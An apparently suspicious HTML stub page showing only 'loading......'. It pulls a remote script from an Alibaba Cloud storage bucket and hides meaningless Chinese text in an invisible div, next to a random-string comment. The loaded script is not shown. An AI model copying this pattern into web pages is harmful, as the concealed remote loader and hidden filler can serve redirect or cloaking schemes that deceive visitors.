<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta content="width=device-width,initial-scale=1,user-scalable=0,minimum-scale=1,maximum-scale=1" name="viewport" />
<meta content="yes" name="apple-mobile-web-app-capable" />
<meta content="black" name="apple-mobile-web-app-status-bar-style" />
<meta content="no" name="msapplication-tap-highlight" />
<meta content="IE=edge" http-equiv="X-UA-Compatible" />
<title>....</title>
<script src="//kmdns.oss-cn-shanghai.aliyuncs.com/s.js"></script>
<!-- h0zldDMNGCcoX7aJWRH9m3IPfkrpYgFB41ZwE6tvKOynix8TjuqAU2QsVebLS5 -->
</head>
<body>
loading......
<div style="display: none;">炆筢騕鵦秱醴賷扮故哾嫋脑術要鐪鰓焴寃斬廉肫皪剤</div>
</body>
</html>
